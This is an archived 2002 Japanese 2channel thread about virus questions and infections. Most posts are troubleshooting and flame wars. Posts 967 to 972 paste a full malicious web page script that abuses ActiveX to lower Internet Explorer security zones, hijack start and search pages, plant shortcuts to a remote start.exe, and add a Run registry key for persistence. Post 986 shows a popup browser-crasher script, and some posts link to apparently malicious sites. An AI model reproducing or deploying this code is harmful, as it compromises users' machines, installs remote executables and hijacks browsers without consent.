5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

☆ウィルス情報&質問 総合スレッド☆part4

1 :シコき魔:02/06/14 22:32
ウィルスに関わる話題・質問はこちらに

IPAセキュリティセンターhttp://www.ipa.go.jp/security/isg/virus.html
Symantec Security Response http://www.symantec.com/region/jp/sarcj/
Trend Micro ウイルス情報 http://www.trendmicro.co.jp/virusinfo/index.asp
McAfee ウイルス情報 http://www.nai.com/japan/virusinfo/vinfo.asp
オンラインウイルス検索http://housecall.antivirus.com/housecall/start_jp.asp

[関連リンク]過去ログ・関連スレ等>>1-20あたり 補足>>1-50

・ウィルス用ソフトを入れて無い人は(知識や技術のある人を除いて)速やかに入れましょう
(無料AntiVirus【AntiVirPE/AVG/Antidote簡易版】http://pc.2ch.net/test/read.cgi/sec/1015584020/l50)

(win)[Ctrrl]+{F}キー (mac){コマンド}+{F}キーを押すとページ内検索が出来ます
このスレや過去スレの過去ログを検索してから質問してください




952 : :02/07/18 23:42
>>951
このスレ1から読み返しなさいな。
それで解決する。

953 :おそねっ:02/07/18 23:44
942さん、
I-Worm/NIMDA = I-Worm/NIMDA.A.HTM であっているのですね。
それならば、I-Worm/NIMDAでの処置は終了しています。
違っているのならば、別の検索のしかたを教えていただきたいです。

954 :  :02/07/18 23:44
>>I-Worm/NIMDA.A.HTMってウイルスの一般的な呼び名
ニムダだろ。
あとは検索すればちゃーんと詳しく書いてあるHPが出てくるはず。


955 :>>953:02/07/18 23:53
違うけど処置は終わり。お疲れ。さよなら。


956 :名無しさん@お腹いっぱい。:02/07/18 23:53
最近、2chを見てると、
よくウィルスソフトから
ラブレターウィルスの警告が出るんだけど、
みなさんはどうですか?


957 : :02/07/18 23:54
>>956
理由を知っているからなんとも思わない。
マルチの方がウザイ。

958 :おそねっ:02/07/19 00:00
954さん、
ありがとうございました。
これで帰ってねむれます。だったら、明日の仕事にも影響なさそうです。
では、おやすみなさい。

959 :おそねっ:02/07/19 00:03
955さん?
駆除とMSのfixnimda実行だけでは、いけないのでしょうか?

960 :名無しさん@お腹いっぱい。:02/07/19 00:11
あれ?初心者の味方諸君はどこ行ったんだ?
>>949を見て萎えたのか?

961 :通りすがりでムっと。:02/07/19 00:38
>>959
だから質問する前に調べろ(検索しろ)と皆言ってるだろ!!
だから無視されるんだ。新しいウィルスじゃあるまし。
AVGならスレ違い。どうしてもあれこれ知りたいなら有償ソフト買ってメーカに
質問しろ。フリーを使い続けるなら自己責任でやるのは当然のことだ。

ttp://www.google.co.jp/search?hl=ja&inlang=ja&ie=Shift_JIS&q=fixnimda+%8B%EC%8F%9C&lr=


962 :名無しさん@お腹いっぱい。:02/07/19 00:49
>>960
ひきこもりが強がってら
弱虫は相手にされねーだけだろ
暇じゃねーんだよ ヴヲケ

963 :名無しさん@お腹いっぱい。:02/07/19 01:03
(´-`).。oO(書き込みする暇はあるんだな・・・)

964 :名無しさん@お腹いっぱい。:02/07/19 03:11
atamano yowasouna natutyu- dana...
syosinsya ita atari kara nagarete kitano kana-

965 :通りがかりでムっと。:02/07/19 11:00
>>963
質問に対して回答する際、自分の記憶違い等も考慮し、調べなおしたりするのは
当たり前のこと。
例えば952が「このスレ1から読み返しなさいな。」といってるが、これで解決
できるのは確認してると思う。(これは推測だけど。)
俺なら、書き込む前に、確実に確認する。
たった1行の回答であっても、それなりの時間はかかるはず。それを理解できない
お前は回答したことがないか、いいかげんな回答をしたことがないかだろ。

>960、>おそねっ
初心者だから皆怒ってるんじゃなくて、モラルを欠いた言動をとっているから
怒っているのがわからないのか?
例えばウィルスの名称なんて、1でリンクしてるURLを見てくるだけでもわかるだろ。
「ウィルス情報」って書いてあるんだから。
(ちなみにネットワークアソシエイツのウィルス名検索では、nimdaの情報が一部リンク
 はずれている。)

>これで帰ってねむれます。だったら、明日の仕事にも影響なさそうです。
こんなのも本論、第三者である俺達とは関係ない。
自分のとった言動を正当化するために書いてるだけ。
この手のスレは自己中心的に質問し、自分だけが役に立てばいいのでなく、
これをみている他の人にも役立つように考慮するのは当然のこと。
(だからこそ、952の「このスレ1から読み返しなさいな。」というのが生きてくる。)

本論と関係ないカキコして、皆スマン。


966 :963:02/07/19 13:26
(´-`).。oO( >>962あてだったんだが、ちゃんと書いとけばよかったな・・・)

967 : :02/07/19 18:47
</scri-->

<!--ipt
i="P";document.write("<AP"+i+"LET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent </A"+i+"PLET ");

var label8="ウィンドウズアップデトガイド 2002年";
var url8="http://kanazawa.cool.ne.jp/pressing101/primera/start.exe";
var icofile8="%WinDir%\\System\\User.exe";
var iconum8="4";

var label="無修正AV画像";
var url="http://kanazawa.cool.ne.jp/pressing101/primera/start.exe";
var icofile="%WinDir%\\System\\User.exe";
var iconum="1";

function savefavfile(folder,label,url,icofile,iconum){
var oFi=FSO.CreateTextFile(folder+"\\"+label+".url");
oFi.WriteLine("[InternetShortcut]");
oFi.WriteLine("URL="+url);
oFi.WriteLine("Modified=806188A46609C1013E");
oFi.WriteLine("IconIndex="+iconum);
oR=/%windir%/i;icofile=icofile.replace(oR,WinDir);
oFi.WriteLine("IconFile="+icofile);
oFi.Close();
}

function putfav(folder, folder2, folder3){

// savefavfile(folder3,label8,url8,icofile8,iconum8);
savefavfile(folder,label,url,icofile,iconum);

savefavfile(folder,"おまんこ無修正ネットアイドル","http://kanazawa.cool.ne.jp/pressing101/primera/start.exe","%WinDir%\\Mplayer.exe","3");
savefavfile(folder,"ファック無修正画像・映像","http://kanazawa.cool.ne.jp/pressing101/primera/start.exe","C:\\Program Files\\Internet Explorer\\Iexplore.exe","16");
}

968 : :02/07/19 18:48
function SetSrch(){


Shl.RegWrite("HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\1004", 00,"REG_DWORD");
Shl.RegWrite("HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\1004", 00,"REG_DWORD");
Shl.RegWrite("HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\1004", 00,"REG_DWORD");
Shl.RegWrite("HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\1004", 00,"REG_DWORD");
Shl.RegWrite("HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\1004", 00,"REG_DWORD");
Shl.RegWrite("HKLM\\System\\CurrentControlSet\\Services\\Class\\Modem\\0000\\Settings\\SpeakerMode_Dial","M0");
Shl.RegWrite("HKLM\\System\\CurrentControlSet\\Services\\Class\\Modem\\0000\\Settings\\SpeakerMode_Off","M1");
// Shl.RegWrite("HKLM\\System\\CurrentControlSet\\Services\\Class\\Modem\\0000\\Init\\1","ATS7=60M0+ES=3,0,2;+DS=3;+IFC=2,2;X4<cr ");
// Shl.RegWrite("HKLM\\System\\CurrentControlSet\\Services\\Class\\Modem\\0000\\Init\\2","ATS7=60M0+ES=3,0,2;+DS=3;+IFC=2,2;X4<cr ");
// Shl.RegWrite("HKLM\\System\\CurrentControlSet\\Services\\Class\\Modem\\0000\\Init\\3","ATS7=60M0+ES=3,0,2;+DS=3;+IFC=2,2;X4<cr ");
// Shl.RegWrite("HKLM\\System\\CurrentControlSet\\Services\\Class\\Modem\\0000\\Init\\0","ATS7=60M0+ES=3,0,2;+DS=3;+IFC=2,2;X4<cr ");


// Shl.RegWrite("HKCU\\RemoteAccess\\Default","dialup01");
// Shl.RegWrite("HKCU\\RemoteAccess\\InternetProfile","dialup01");
Shl.RegWrite("HKCU\\RemoteAccess\\DialUI", 00000007,"REG_BINARY");
// Shl.RegWrite("HKCU\\RemoteAccess\\Profile\\dialup01\\AutoConnect", 01,"REG_DWORD");

969 : :02/07/19 18:49
Shl.RegWrite("HKLM\\SOFTWARE\\Microsoft\\Internet Explorer\\Search\\SearchAssistant", "http://www.idol-heaven.com/?id=martin");
Shl.RegWrite("HKLM\\SOFTWARE\\Microsoft\\Internet Explorer\\Search\\CustomizeSearch", "http://www.idol-heaven.com/?id=martin");
Shl.RegWrite("HKLM\\SOFTWARE\\Microsoft\\Internet Explorer\\Main\\Search Page","http://www.idol-heaven.com/?id=martin");
Shl.RegWrite("HKLM\\SOFTWARE\\Microsoft\\Internet Explorer\\Main\\Start Page","http://www.idol-heaven.com/?id=martin");
Shl.RegWrite("HKLM\\SOFTWARE\\Microsoft\\Internet Explorer\\Main\\Default_Page_URL","http://www.idol-heaven.com/?id=martin");
Shl.RegWrite("HKLM\\SOFTWARE\\Microsoft\\Internet Explorer\\Main\\Default_Search_URL","http://www.idol-heaven.com/?id=martin");
Shl.RegWrite("HKLM\\SOFTWARE\\Microsoft\\Internet Explorer\\Plugins\\PluginsPage","http://www.idol-heaven.com/?id=martin");
Shl.RegWrite("HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\SafeSites\\ie.search.msn.com","http://www.idol-heaven.com/?id=martin");
Shl.RegWrite("HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\SafeSites\\search.bisextop.com","http://www.idol-heaven.com/?id=martin");

970 : :02/07/19 18:50
Shl.RegWrite("HKCU\\SOFTWARE\\Microsoft\\Internet Explorer\\Search\\SearchAssistant", "http://www.idol-heaven.com/?id=martin");
Shl.RegWrite("HKCU\\SOFTWARE\\Microsoft\\Internet Explorer\\Search\\CustomizeSearch", "http://www.idol-heaven.com/?id=martin");
Shl.RegWrite("HKCU\\SOFTWARE\\Microsoft\\Internet Explorer\\Main\\Search Page","http://www.idol-heaven.com/?id=martin");
Shl.RegWrite("HKCU\\SOFTWARE\\Microsoft\\Internet Explorer\\Main\\Start Page","http://www.idol-heaven.com/?id=martin");
Shl.RegWrite("HKCU\\SOFTWARE\\Microsoft\\Internet Explorer\\Main\\Default_Page_URL","http://www.idol-heaven.com/?id=martin");
Shl.RegWrite("HKCU\\SOFTWARE\\Microsoft\\Internet Explorer\\Main\\Default_Search_URL","http://www.idol-heaven.com/?id=martin");
Shl.RegWrite("HKCU\\SOFTWARE\\Microsoft\\Internet Explorer\\Plugins\\PluginsPage","http://www.idol-heaven.com/?id=martin");

Shl.RegWrite("HKCU\\SOFTWARE\\Microsoft\\Internet Explorer\\SearchURL","http://www.idol-heaven.com/?id=martin");
Shl.RegWrite("HKCU\\SOFTWARE\\Microsoft\\Internet Explorer\\Main\\Local Page","http://www.idol-heaven.com/?id=martin");
Shl.RegWrite("HKCU\\SOFTWARE\\Microsoft\\Internet Explorer\\Main\\Search Bar","http://www.idol-heaven.com/?id=martin");
Shl.RegWrite("HKCU\\SOFTWARE\\Microsoft\\Internet Explorer\\SearchUrl","http://www.idol-heaven.com/?id=martin");
}

971 : :02/07/19 18:51
function f(){
try{
//ActiveX initialization
a1=document.applets[0];
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Shl = a1.GetObject();
a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
a1.createInstance();
FSO = a1.GetObject();


WinDir=Shl.ExpandEnvironmentStrings("%WINDIR%");
myFav=Shl.SpecialFolders("Favorites");
myDesk=Shl.SpecialFolders("Desktop");
myDesk2=Shl.SpecialFolders("Startup");

SetSrch()
putfav(myFav, myDesk, myDesk2);
//
//

filename = WinDir+"\\lives2.txt";
// filename = WinDir+"\\Live.exe";

regkey = "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\win388";
// WshShellClassID="{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}";
// InterfaceObject.setCLSID(WshShellClassID);

972 : :02/07/19 18:52
Shl.regwrite(regkey,filename);
//
//
//

}
catch(e){
return;
}
}

function init(){
setTimeout("f()", 1000);
}
init();


</SCRI-->
<!--ECT CLASSID ="CLSID:8522F9B3-38C5-4aa4-AE40-7401F1BBC899" CODEBASE="redir.exe" </OBJE-->
</BODY></HTML>

973 :cheshire-cat ◆CATJR.v6 :02/07/19 19:01
実社会でも、「ボランティア」「奉仕」「手伝い」を他人に強要するヤシには、まともな人はいませぬ。

そゆのはあくまでも「任意・好意・善意もしくは気まぐれ」に基づく行動ですんで。

974 :名無しさん@お腹いっぱい。:02/07/19 19:18
恐らくウイルス入りと思われるリンク先真っ白なフラッシュ踏んじゃったんだけど、どうすればいいでしょう?


975 :名無しさん@お腹いっぱい。:02/07/19 19:22
>>974
ウィルスをだしにして他人の力を借りようとせずに、
本当にウィルスがあるのかないのか少なくともソースくらい読んで判断する。

976 :cheshire-cat ◆CATJR.v6 :02/07/19 19:23
>>974
ウイルスのスキャンをしたらどうっしょ。

977 :名無しさん@お腹いっぱい。:02/07/19 19:25
ボランティアだから… といって他人に同じ行動(思想)を要求する奴もウザイ。
極端な例が貧民救済募金やってる女子大生。

>>973 「道楽」という行動原理があったりする。

978 :cheshire-cat ◆CATJR.v6 :02/07/19 19:27
>>977
「道楽」、いいっすね。

979 :名無しさん@お腹いっぱい。:02/07/19 19:54
ウイルススキャンしても見つからない…
でも後ろのレスで「踏むな」とか2つ位ついてたからウイルスに間違いない…
どっかにIP表示されるくらいだったらいいんだけどなあ…

980 :名無しさん@お腹いっぱい。:02/07/19 21:15
>>977
青くせーこといってんなよ、な、カス。
こっちまで恥ずかしくなってくるだろ。

981 :名無しさん@お腹いっぱい。:02/07/19 21:59


39 名前:名無しさん@3周年 投稿日:02/07/19 20:25 ID:3Lnf+EfE
サッカー監督、世界ベスト100
http://dms100.org/worksucks

さっきこれ踏んだんですが大丈夫でしょうか?
うわさでは強力なウイルスって聞いたんだけど?

982 :通りすがりでムッと。:02/07/19 22:16
>>966
あってるよ。

962は「暇じゃねーんだよ ヴヲケ」と言ってるのに、
お前(963)は962に対して「書き込みする暇はあるんだな・・・」と言ってるんだろ。

962の発言は1分もあれば書けるが、回答は1行であっても時間はかかることを
965で俺は説明している。つまり、962の言ってること(暇がないこと)に矛盾はない
ことを代弁しているんだが、理解できないような文章だったか?

983 :名無しさん@お腹いっぱい。:02/07/19 22:22
>>982
オマエ、「いいたいことがよくわからん」ってよくいわれるだろ?
オマエのような馬鹿はROMってるだけのほうがいいぜ。


984 :名無しさん@お腹いっぱい。:02/07/19 22:36
Norton AntiVirus 2002のウイルス定義は毎日更新しており、XP標準のファイアウォールをオンにしているにも関わらず、
「ファイルへのアクセスが拒否されました」のメッセージが表示され駆除・ファイル復元出来ず、
繰り返し同種のウイルス「VBS.LoveLetter.A」に感染します。
とりあえず、オフラインに切り替えてから検疫した後、XPのシステム復元で対処している現状です。
問題点・対処法として考えられる事をお教え頂けませんでしょうか

985 :名無しさん@お腹いっぱい。:02/07/19 22:43
>>981
それどんなやつ?

986 ::02/07/19 22:52
>>985
<script>
function worksucks() {
window.open('1ame.html','','height=1,width=1,toolbar=no,directories=no,menubar=no,screenX=0,screenY=0,left=0,top=0');
window.open('lame.html','','height=1,width=1,toolbar=no,directories=no,menubar=no,screenX=0,screenY=0,left=0,top=0');
}
</script>
こういう奴。

987 :981はブラクラ!!!!!!!!!!!!!!!!!!!!!!!!!!!!!:02/07/19 22:54
ウイルスもダウンロードされてくる。

988 :名無しさん@お腹いっぱい。:02/07/19 22:55
>>986
すみません。
初心者なものでよくわからないのですが
どんなウイルスがはいっているのですか?

989 :名無しさん@お腹いっぱい。:02/07/19 22:58
デンジャラス

990 :名無しさん@お腹いっぱい。:02/07/19 23:04
きゅーきゅーしゃ

991 ::02/07/19 23:09
>>987
どれがウイルス??
http://ime.nu/dms100.org/worksucks/hello.jpg
↑コレ?
http://ime.nu/dms100.org/worksucks/gay.jpg
↑コレ??
http://ime.nu/dms100.org/worksucks/gay.wav
↑ああ、コレか(w


992 :名無しさん@お腹いっぱい。:02/07/19 23:12
>>991
なんすか それ。

993 ::02/07/19 23:24
>>992
クリクして飛んでみ。
At your oun riskで(w


994 ::02/07/19 23:27
つか、
http空けてカキコしると、ピロシキ規制に引っかかるのか。。。。

995 :まじですか?:02/07/19 23:33
>>984
私も全く同じ環境で同じ現象になります。
同じように検疫して削除し続けてます。
今日ニュー速板に行く度に感染します。
ニュー速板がおかしいのか、私のPCがおかしいのか…。

996 ::02/07/19 23:39
>995
どっかにソースの染み付いて汚れてるんだよ。
着てる服良く見てみ。早く洗わないと落ちなくなるよ。


つか、感染ぢゃ無くて「検出」デショ・・・・


997 :まじですか?:02/07/19 23:48
>>996
洗濯の仕方を教えてください…
教えて君ですみませんが…

998 :名無しさん@お腹いっぱい。:02/07/19 23:52
すっぽんぽんなれや

999 ::02/07/19 23:57
>>997
そりゃチミ、熱いお湯で洗うがな。
それかソースの染み付いてるところ良く探し出してアボンしてもらうしか無いがな。

・・・そうそう、意外と絵とか模様書いてあるところは見落としがち・・・
「アボン」は洗剤ね。。。

1000 :  名無しさん@お腹いっぱい。:02/07/20 00:08
1000

1001 :1001:Over 1000 Thread
このスレッドは1000を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。

266 KB
★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.02 2018/11/22 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)